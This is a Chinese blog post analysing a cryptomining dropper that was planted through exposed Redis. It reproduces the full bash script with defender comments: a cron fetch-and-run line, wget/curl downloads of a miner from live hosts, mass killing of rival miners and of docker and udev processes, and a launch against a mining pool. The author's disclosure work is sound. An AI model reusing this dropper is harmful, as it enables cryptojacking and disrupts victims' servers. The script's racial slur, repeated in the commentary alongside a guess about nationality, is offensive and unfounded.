发现有人利用redis权限写入挖矿脚本
xxx(被入侵的主机):6379> get weaponZ
-
"\n*/7 * * * * wget -q -O- --no-check-certificate | bash\n"
-
#!/bin/bash
-
# Analyst note: this is a captured dropper, reproduced as found. The lone "-"
# lines between statements appear to be artifacts of the blog's rendering,
# not part of the original script.
# An explicit PATH is set so that the later wget/curl/ps/skill/chmod calls
# resolve against these directories rather than whatever PATH the cron job
# (see the "*/7 * * * * ... | bash" entry above) inherits.
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
-
#######################################
# Stages the miner binary at /tmp/littletrump.
# Globals:   PS2 (read) - number of running "littletrump" processes, assigned
#            by the top-level code before this function is called
# Arguments: none
# Outputs:   writes /tmp/littletrump; wget/curl diagnostics on stderr
# Returns:   status of the last command executed in the chosen branch
#
# Analyst notes (defender view):
#  - the branch is selected by `uname -i`; the x86_64 branch and the
#    catch-all else branch fetch the same pixeldra.in id (VgPwWK), the
#    i386 branch fetches NxQkhz
#  - TLS certificate validation is disabled on every fetch
#    (wget --no-check-certificate, curl -k), so egress logs showing
#    pixeldra.in downloads from a server are a useful detection point
#  - `[ $? -ne 0 -a $PS2 -eq 0 ]` uses the deprecated "-a" conjunction;
#    the curl fallback runs only when wget failed AND PS2 is 0
#  - IoCs on disk: /tmp/littletrump (and any /tmp/littletrump* remnants)
#######################################
getLittletrump(){
-
# Hardware platform string; `uname -i` may print "unknown" on some
# distributions, which routes execution to the else branch below.
ARCH=$(uname -i)
-
if [ "$ARCH" == "x86_64" ]
-
then
-
# Remove any earlier copy before re-downloading.
rm -rf /tmp/littletrump*
-
# Primary fetch; certificate checking disabled.
wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
-
# $? is wget's exit status; PS2 is the global process count from the caller.
if [ $? -ne 0 -a $PS2 -eq 0 ];
-
then
-
# Fallback fetch with curl; -k likewise skips certificate verification.
curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
-
fi
-
elif [ "$ARCH" == "i386" ]
-
then
-
rm -rf /tmp/littletrump*
-
# 32-bit build uses a different pixeldra.in id.
wget https://pixeldra.in/api/download/NxQkhz --no-check-certificate -O /tmp/littletrump
-
if [ $? -ne 0 -a $PS2 -eq 0 ];
-
then
-
curl -sk https://pixeldra.in/api/download/NxQkhz -o /tmp/littletrump
-
fi
-
else
-
# Unknown architecture: same download as the x86_64 branch.
rm -rf /tmp/littletrump*
-
wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
-
if [ $? -ne 0 -a $PS2 -eq 0 ];
-
then
-
curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
-
fi
-
fi
-
}
-
-
#######################################
# Terminates competing processes before the sample's own miner is started.
# Globals:   none
# Arguments: none
# Outputs:   kill/skill diagnostics on stderr
# Returns:   status of the final `skill` invocation
#
# Analyst notes (defender view):
#  - each `ps -ef | grep PATTERN | grep -v grep | awk '{print $2}' | xargs kill -9`
#    line SIGKILLs every process whose full command line (arguments included)
#    contains PATTERN; the patterns are mostly mining-pool hostnames
#  - the matches are plain substrings, so "docker", "udevd", "udevs", "xmr"
#    and "monero" also hit unrelated processes (e.g. the Docker daemon and
#    its containers, likely systemd-udevd). Unexplained SIGKILLs of such
#    services are often the first visible symptom of this sample on a host
#  - the second half repeats the same names through `skill -KILL`, which
#    selects processes by name/user/tty rather than by a ps line
#######################################
killNiggiz(){
-
# Pipeline form: list processes, keep matching command lines, drop the grep
# itself, take the PID column, SIGKILL.
ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
-
# Very broad substring: any command line containing "xmr".
ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
-
# Collateral: matches legitimate udev daemons as well.
ps -ef | grep udevd | grep -v grep | awk '{print $2}' | xargs kill -9
-
# Collateral: kills Docker-related processes on the host.
ps -ef | grep docker | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep hashvault | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep moneroocean | grep -v grep | awk '{print $2}' | xargs kill -9
-
ps -ef | grep evolutions | grep -v grep | awk '{print $2}' | xargs kill -9
-
# Second pass over the same names via procps `skill`.
skill -KILL crypto-pool
-
skill -KILL nanopool
-
skill -KILL supportxmr
-
skill -KILL minexmr
-
skill -KILL dwarfpool
-
skill -KILL xmrpool
-
skill -KILL moneropool
-
skill -KILL xmr
-
skill -KILL monero
-
skill -KILL udevs
-
skill -KILL udevd
-
skill -KILL docker
-
skill -KILL hashvault
-
skill -KILL moneroocean
-
skill -KILL evolutions
-
}
-
-
# Top-level flow: clear competitors, fetch the payload if it is not already
# running, make it executable, and start it.
killNiggiz
-
-
# Count of processes whose `ps aux` line contains "littletrump" (the grep
# itself excluded). Note the variable name shadows bash's secondary-prompt
# variable PS2; harmless in a non-interactive script. This global is also
# read inside getLittletrump.
PS2=$(ps aux | grep littletrump | grep -v "grep" | wc -l)
-
# Download only when no miner process was found.
if [ $PS2 -eq 0 ];
-
then
-
getLittletrump
-
fi
-
# The second chmod makes the binary world-readable/writable/executable
# (mode 777); a 777 file named littletrump in /tmp is itself an IoC.
chmod +x /tmp/littletrump
-
chmod 777 /tmp/littletrump
-
if [ $PS2 -eq 0 ];
-
then
-
# Launch. The option shape (-o pool host, -k, -B) resembles common Monero
# miner CLIs, but the binary itself is not on this page - confirm from the
# sample. Network IoC: connections to pool.t00ls.ru.
/tmp/littletrump -o pool.t00ls.ru -k -B
-
fi
函数名称居然叫做'杀死黑鬼',而且挖矿程序名称叫做“小川普”,感觉是老美的家伙干的,挺猥琐的:先杀死其他人的挖矿进程,然后启动自己的进程挖矿